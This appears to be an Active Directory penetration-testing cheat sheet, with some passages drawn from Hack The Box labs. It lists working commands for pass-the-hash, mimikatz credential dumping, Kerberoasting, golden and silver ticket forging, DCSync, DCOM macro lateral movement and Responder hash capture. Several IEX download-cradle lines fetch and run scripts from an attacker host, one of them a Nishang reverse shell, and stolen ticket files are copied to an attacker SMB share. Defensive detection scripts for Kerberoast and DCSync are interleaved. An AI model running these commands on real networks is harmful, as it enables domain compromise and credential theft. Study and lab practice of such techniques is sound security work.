Active Directory
RUNDOWN OF USEFUL TECHNIQUES
======================================================
TGT USE WITH AUTHENTICATION
└─$ kerbrute -dc-ip 10.10.1.299 -domain domain.com -user user01 -password password12345
└─$ KRB5CCNAME=user01.ccache impacket-psexec -k -no-pass domain.com/[email protected]
======================================================
CONNECTIONS VIA CRACKMAPEXEC PTH EVIL-WINRM
FIND ACCOUNT LOCKOUT ATTEMPTS IF ABLE:
PS C:\Users\computer.corp> net accounts
└─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345
└─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345 -M mimikatz
└─$ crackmapexec smb 10.10.1.299 -u administrator -H 'ee0e207898a5beee01f38115019ee2fb' --local-auth --sam
└─$ pth-winexe -U Administrator%ee0e207898a5beee01f38115019ee2fb:ee0e207898a5beee01f38115019ee2fb //10.10.1.299 cmd
└─$ evil-winrm -u user03 -p password12345 -i 10.10.1.299
└─$ xfreerdp /u:user04 /d:domain.com /p:password12345 /v:10.10.1.299
└─$ rdesktop 10.10.1.299 -u user03 -p password12345
C:\tmp> .\psexec.exe \\dc-dc01 cmd.exe (MAYBE...)
THE PTH OPENS A SHELL ON THE DESKTOP, SO REMOTE IN TO DO THIS
mimikatz # sekurlsa::pth /user:user05_admin /domain:corp.com /ntlm:e2b475e11da2a0748290d87ee966e327 /run:PowerShell.exe
======================================================
SCRIPTS
SERVICE ACCOUNTS
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1')
LIST USERS
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1')
LIST EVERYTHING
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1')
SPECIFY A NAME BY CHANGING THE SCRIPT
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1')
POWERVIEW
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1')
CHECK CREDENTIALS BY CHANGING THE SCRIPT
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/credentials_script.ps1') <-- ONLY TO VERIFY
KERBEROAST
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1')
REVERSE SHELL (NISHANG)
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-PowerShellTcp.ps1')
======================================================
KERBEROAST - NEED PRIV'D ACCOUNT (LIKE ADMINISTRATOR)
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1')
Invoke-Kerberoast -outputformat hashcat | fl
└─$ hashcat -m 13100 svc.hash /usr/share/wordlists/rockyou.txt
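Detection side of the Kerberoast step above, as an added example (not part of these notes): Invoke-Kerberoast asks the KDC for RC4 (etype 0x17) service tickets for every SPN it finds, which shows up on the DC as a burst of Security event 4769 records from one account. The script below assumes 4769 events exported to a simple key=value line format; the sample records are constructed.

```python
"""Flag Kerberoast-style TGS requests in Windows Security event 4769 records.

Added example, not from the original notes. It assumes 4769 events have been
exported to a key=value text form (constructed here, not a real log format).
"""
from collections import defaultdict

# 4769 'Ticket Encryption Type' values: 0x17 = RC4-HMAC, 0x12 = AES256,
# 0x11 = AES128. Kerberoast tooling asks for RC4 because the resulting
# TGS-REP is cheap to crack offline (hashcat -m 13100).
RC4_HMAC = "0x17"

# Constructed sample: user03 requests RC4 tickets for several service accounts
# within seconds; user04 shows normal AES traffic; user05 renews a TGT.
SAMPLE_4769 = """\
time=12:00:01 account=user03@CORP.COM service=svc_sql client=10.10.1.50 etype=0x17 status=0x0
time=12:00:01 account=user03@CORP.COM service=svc_http client=10.10.1.50 etype=0x17 status=0x0
time=12:00:02 account=user03@CORP.COM service=svc_backup client=10.10.1.50 etype=0x17 status=0x0
time=12:00:05 account=user04@CORP.COM service=CLIENT06$ client=10.10.1.60 etype=0x12 status=0x0
time=12:00:06 account=user04@CORP.COM service=svc_sql client=10.10.1.60 etype=0x12 status=0x0
time=12:00:07 account=user05@CORP.COM service=krbtgt client=10.10.1.70 etype=0x17 status=0x0
"""


def parse_4769(text):
    """Parse key=value lines into dicts; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        events.append(dict(field.split("=", 1) for field in line.split()))
    return events


def is_roastable_request(ev):
    """RC4 ticket, successfully issued, for a service that is neither a
    computer account (name ends in $) nor krbtgt: the crackable case."""
    service = ev["service"]
    return (ev["etype"] == RC4_HMAC
            and ev["status"] == "0x0"
            and not service.endswith("$")
            and service.lower() != "krbtgt")


def find_kerberoast_candidates(events, min_spns=2):
    """Group roastable requests by requesting account and report accounts
    that hit min_spns or more distinct service accounts (the mass-request
    pattern Invoke-Kerberoast produces). Returns {account: [services]}."""
    spns_by_account = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            spns_by_account[ev["account"]].add(ev["service"])
    return {acct: sorted(spns) for acct, spns in spns_by_account.items()
            if len(spns) >= min_spns}


if __name__ == "__main__":
    for acct, spns in find_kerberoast_candidates(parse_4769(SAMPLE_4769)).items():
        print(f"{acct}: RC4 TGS requests for {', '.join(spns)}")
```

The etype check is the important part: an environment whose service accounts only allow AES (msDS-SupportedEncryptionTypes) makes RC4 requests fail, so a single 0x17 request against a user SPN is itself worth a look, independent of the count threshold.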
======================================================
CREATE REVERSE DNS ENTRY ON THE DC (FROM HTB INTELLIGENCE)
python3 dnstool.py -u 'intelligence\tiffany.molina' -p NewIntelligenceCorpUser9876 -r webstuff.intelligence.htb -a add -t A -d 10.10.14.9 10.129.95.154
VERIFY
└─$ nslookup
> server 10.129.95.154
> webstuff.intelligence.htb
======================================================
IF YOU SEE GMSA PRIVILEGES (FROM HTB INTELLIGENCE)
└─$ python3 gMSADumper.py -u 'ted.graves' -p Mr.Teddy -d intelligence.htb
LOOKING FOR SERVICE ACCOUNT HASH DUMPS
THIS DUMPS THE HASH FOR THE SERVICE ACCOUNT
svc_int$:::16cba97b4bc423795585b0b4bcee5047
======================================================
TIME SYNC
└─$ timedatectl set-ntp false
└─$ sudo rdate -n dc.intelligence.htb
OPTIONAL: sudo ntpdate 10.129.95.154
======================================================
DC SYNC
mimikatz # lsadump::dcsync /user:Administrator
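What lsadump::dcsync looks like from the DC's side, as an added example (not part of these notes): the tool asks the DC to replicate the account like another DC would, which needs the DS-Replication-Get-Changes rights on the domain object and, with Directory Service Access auditing on, is written as Security event 4662 carrying those control-access-right GUIDs. The record layout and the allow-list of expected replicators below are constructed for the example; the GUIDs are the real schema values.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662.

Added example, not from the original notes. The event dicts below are a
constructed simplification of 4662 (real events carry the object class as a
GUID and the rights under a 'Control Access' heading in the Properties field).
4662 is only written when Directory Service Access auditing is enabled.
"""

# Control-access-right GUIDs that DCSync needs on the domain naming context.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts expected to replicate: domain controller machine accounts and,
# in real deployments, directory sync accounts. Constructed for the example.
EXPECTED_REPLICATORS = {"DC01$", "DC02$", "MSOL_a1b2c3"}

# Constructed sample records: a DC replicating normally, a plain user
# exercising both replication rights, and an unrelated read on a user object.
SAMPLE_4662 = [
    {"subject": "CORP\\DC02$", "object_type": "domainDNS",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"subject": "CORP\\user02", "object_type": "domainDNS",
     "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"subject": "CORP\\user02", "object_type": "domainDNS",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"subject": "CORP\\user03", "object_type": "user",
     "properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights_in(properties):
    """Names of replication rights whose GUIDs appear in a 4662 Properties
    field (whitespace-separated, brace-wrapped GUID list)."""
    guids = {g.strip("{}").lower() for g in properties.split()}
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in guids]


def find_dcsync_candidates(events, expected=EXPECTED_REPLICATORS):
    """Subjects that used replication rights on the domain object and are not
    expected replicators, mapped to the sorted list of rights they used."""
    hits = {}
    for ev in events:
        rights = replication_rights_in(ev["properties"])
        if not rights or ev["object_type"] != "domainDNS":
            continue
        account = ev["subject"].split("\\", 1)[-1]   # drop the DOMAIN\ prefix
        if account in expected:
            continue
        hits.setdefault(ev["subject"], set()).update(rights)
    return {subj: sorted(r) for subj, r in hits.items()}


if __name__ == "__main__":
    for subj, rights in find_dcsync_candidates(SAMPLE_4662).items():
        print(f"{subj}: replication rights used: {', '.join(rights)}")
```

Keep the expected-replicator set small and reviewed: any account outside it that holds these rights is effectively a Domain Admin, which is also the thing to audit on the domain object's ACL before an event ever fires.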
======================================================
SILVER TICKET
USING SERVICE ACCOUNT DISCOVERED USING GMSA (svc_int$)
└─$ impacket-getST -spn www/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes HASH:HASH
└─$ KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass intelligence.htb/[email protected]
======================================================
GOLDEN BUT NOT GOLDEN TICKET
C:\>whoami /user (LOOKING FOR SID)
mimikatz # kerberos::purge
mimikatz # kerberos::list
mimikatz # kerberos::golden /user:user02 /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2555479668 /target:CorpWebServer.corp.com /service:HTTP /rc4:e2b475e11da2a0748290d87ee966e327 /ptt
mimikatz # kerberos::list
READOUT TO GOLDEN: /user /domain /sid /target /service:HTTP /rc4
NOTE: CAN'T DO THIS WITH CLEAR-TEXT PASSWORD... MUST HASH FIRST
======================================================
GOLDEN TICKET
C:\Tools\active_directory> psexec.exe \\dc01 cmd.exe
ACCESS DENIED WHICH CACHES THE HASH
mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch
mimikatz # kerberos::purge
mimikatz # kerberos::golden /user:fakeuser /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599470068 /krbtgt:75b60230a2394a812000dbfad8415965 /ptt
mimikatz # misc::cmd
C:\Users\user02.corp> psexec.exe \\dc01 cmd.exe
======================================================
DCOM - DISTRIBUTED COMPONENT OBJECT MODEL (LATERAL MOVEMENT)
SHOW AVAILABLE METHODS - LOOKING FOR RUN AND WORKBOOK
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
$com | Get-Member
CREATE VBA MACRO (SHELL CODE GOES IN PLACE OF NOTEPAD)
Sub mymacro()
Shell ("notepad.exe")
End Sub
SCRIPT TO RUN, WILL CONNECT AND RUN THE MACRO
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
$LocalPath = "C:\Users\user05_admin.corp\myexcel.xls"
$RemotePath = "\\192.168.1.110\c$\myexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
# Excel running as SYSTEM needs this Desktop folder to exist or Workbooks.Open fails
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$Workbook = $com.Workbooks.Open("C:\myexcel.xls")
$com.Run("mymacro")
======================================================
SERVICE TICKET REQUEST
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::tickets
PS C:\tmp> Add-Type -AssemblyName System.IdentityModel
PS C:\tmp> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/MSSQL.domain.com'
PS C:\tmp> klist
THEN MIMIKATZ
sekurlsa::tickets - we see the ticket for HTTP
kerberos::list /export
THEN SEND THE FILE TO ATTACK COMPUTER
PS C:\tmp> copy .\2-40a50000-client06$@HTTP~MSSQL.domain.com-SVCORP.COM.kirbi \\192.168.119.299\share
THEN CRACK
└─$ ./tgsrepcrack.py /usr/share/wordlists/rockyou.txt mssql.kirbi
CRACK WITH JOHN OR HASHCAT
kirbi2john mssql.kirbi > mssql.hash
john mssql.hash
hashcat -m 5600 user04.hash /usr/share/wordlists/rockyou.txt (-m 5600 IS NetNTLMv2, E.G. A RESPONDER CAPTURE; A .kirbi TGS-REP HASH IS -m 13100)
======================================================
POWERVIEW
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1')
Get-NetSession -ComputerName client06 (WORKED)
Get-NetLoggedon -ComputerName client06 (WORKED)
======================================================
RESPONDER
└─$ sudo responder -I tun0
THEN REQUEST SMB FILE SHARES VIA AUTHENTICATION
PS C:\tmp\tickets> net use \\192.168.119.299\share /USER:domain.com\user04
ON REMOTE DESKTOP, THIS WORKED, RESPONDER GOT THE RIGHT HASH!!!
PS C:\tmp\tickets> net use \\192.168.119.299\share
MAY ASK FOR USERNAME/PASS... JUST QUIT OUT OF IT (or use domain.com\user03)
======================================================
BLOODHOUND
└─$ python3 /opt/opt/BloodHound.py/bloodhound.py -ns 10.10.1.299 -d domain.com -dc dc-dc02.domain.com -u user03 -p password12345 -c All
sudo neo4j console
BLOODHOUND GUI - CHANGE PASSWORD http://localhost:7474
bloodhound
IMPORT THE JSON FILES
======================================================
SMB FILE MOVEMENT
AUTHENTICATE: PS C:\tmp\tickets> net use \\192.168.119.299\share student /USER:student
MOVE FILES: PS C:\tmp\tickets> copy .\FILE.kirbi \\192.168.119.299\share
TO STOP THE SHARE: net use \\192.168.119.299\share /DELETE
======================================================
AD SCRIPT REFERENCE
ALL ACCOUNTS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
    Write-Host "------------------------"
}
AD SCRIPT REFERENCE
SERVICE ACCOUNTS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="serviceprincipalname=*http*"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
}
AD SCRIPT REFERENCE
LIST USERS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Searcher.FindAll()
AD SCRIPT REFERENCE
CHANGE SCRIPT TO GET A CERTAIN NAME
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="name=Domain Admins"
$Searcher.FindAll()
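What the four scripts above actually select, as an added example (not one of the page's scripts): the base DN they build from the domain name, and the three filters evaluated against a constructed in-memory directory. Only the filter forms the scripts use are implemented (equality, presence, substring with '*'); the entries and their attribute values are made up for the example.

```python
"""Evaluate the page's DirectorySearcher filters against a constructed directory.

Added example, not from the original notes. Implements just enough of LDAP
filter matching (equality, presence, '*' substring) to show which objects
samAccountType=805306368, serviceprincipalname=*http* and name=Domain Admins
return, and why they differ.
"""
import fnmatch


def domain_to_base_dn(domain):
    """corp.com -> DC=corp,DC=com, the same transform as the scripts'
    "DC=$($domainObj.Name.Replace('.', ',DC='))"."""
    return "DC=" + domain.replace(".", ",DC=")


# samAccountType values from the AD schema: 0x30000000 = normal user account,
# 0x30000001 = machine (computer) account, 0x10000000 = security group.
SAM_USER, SAM_MACHINE, SAM_GROUP = 805306368, 805306369, 268435456

# Constructed entries. Attribute names are lower-cased because LDAP attribute
# types match case-insensitively; values are compared case-insensitively too.
DIRECTORY = [
    {"name": "user03", "samaccounttype": SAM_USER, "serviceprincipalname": []},
    {"name": "svc_http", "samaccounttype": SAM_USER,
     "serviceprincipalname": ["HTTP/web01.corp.com"]},
    {"name": "svc_sql", "samaccounttype": SAM_USER,
     "serviceprincipalname": ["MSSQLSvc/sql01.corp.com:1433"]},
    {"name": "CLIENT06$", "samaccounttype": SAM_MACHINE,
     "serviceprincipalname": ["HOST/client06.corp.com", "HTTP/client06.corp.com"]},
    {"name": "Domain Admins", "samaccounttype": SAM_GROUP, "serviceprincipalname": []},
]


def matches(entry, ldap_filter):
    """Evaluate one 'attr=value' filter against one entry.
    A bare '*' is a presence test; '*' inside the value is a substring match."""
    attr, _, pattern = ldap_filter.strip("()").partition("=")
    values = entry.get(attr.lower(), [])
    if not isinstance(values, list):
        values = [values]
    values = [str(v).lower() for v in values]
    if pattern == "*":
        return bool(values)
    return any(fnmatch.fnmatchcase(v, pattern.lower()) for v in values)


def search(ldap_filter, directory=DIRECTORY):
    """Names of the entries the filter selects, in directory order."""
    return [e["name"] for e in directory if matches(e, ldap_filter)]


if __name__ == "__main__":
    print(domain_to_base_dn("corp.com"))
    for f in ("samAccountType=805306368", "serviceprincipalname=*http*", "name=Domain Admins"):
        print(f"{f:35} -> {search(f)}")
```

The difference worth noticing: samAccountType=805306368 returns user objects only, while serviceprincipalname=*http* also returns computer accounts such as CLIENT06$, whose long random passwords are not a Kerberoast exposure; when reviewing which SPN-bearing accounts carry human-chosen passwords, combine the two conditions rather than relying on the SPN filter alone.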